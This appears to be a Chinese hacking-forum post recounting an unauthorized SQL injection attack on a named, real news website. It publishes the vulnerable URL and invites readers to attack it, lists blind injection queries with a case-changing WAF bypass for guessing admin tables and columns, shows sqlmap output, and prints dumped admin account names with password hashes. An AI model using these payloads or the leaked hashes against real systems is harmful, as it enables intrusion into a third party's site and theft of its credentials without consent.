TA的每日心情 | 擦汗 2016-7-15 14:37 |
---|
签到天数: 14 天 [LV.3]偶尔看看II
|
发现一个站,有注入漏洞,虽然有WAF,但是可大小写绕过
---------------------------------------------------------------------------
url : http://www.smnews.com.cn/special/2012hyjj/shows.asp?id=30
---------------------------------------------------------------------------
貌似还是图片发不出来。。好尴尬-_-!!!
注入点放出来了自己测试吧,利用大小写绕过,,顺便练练手工查询吧^_^
--蛋疼的要死,防注入把我用到的字符串都给过滤了,,包括admin。password的啊:)还好能绕过
order by 一直返回错误所以不能联合查询,可使用半猜解查询
下面是几句我经常用的查询语句
and+(select+count(*)+from+admin)>0 查询表名
and+(select+count(列名)from+admin)>0 查询列名并得到有几条数据
and+(select+top+1+len(username)+from+admin)>0 查询数据长度
and+1=(select+top+1+count(*)+from+manage_user+where+Asc(mid+(username,1))=100)获取数据的值
获取数据值时可以借助burpsuite抓包以及它的intruder模块自动检测。
-------------------------------------------------------------------------
另:使用sqlmap工具进行注入
楼主测试时sqlmap检测到该url含有注入漏洞了,绕过了WAF
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=30 AND 7962=7962
---
然而获取表的时候却成了这样子
------
[16:59:15] [WARNING] no table found
tables: '{}'
-------------
感到了深深的恶意:)
于是想到大小写绕过,利用上边手工注入猜解到的表名列名,直接-T -C --dump得到数据
+-------------------------------------------+----------
| admin | 17525e8d1ef0030fc7bb6c7357f4e181 |
| vjia | 21b95a0f90138767b0fd324e6be3457b |
+-------------------------------------------+----------
---------------------------------
这应该是个分站,主站是dz-php环境,这个站是asp,显然这里得到的数据并不会登录主站。这个分站的后台我也没扫出来。。额,,该再找个字典了,,
没进入后台,这次不成功的渗透,分享给大家,再练一练手工注入,毕竟工具只是简化操作过程,提高效率,然知道工具的原理才能更好的运用。
--by 黎夕
|
|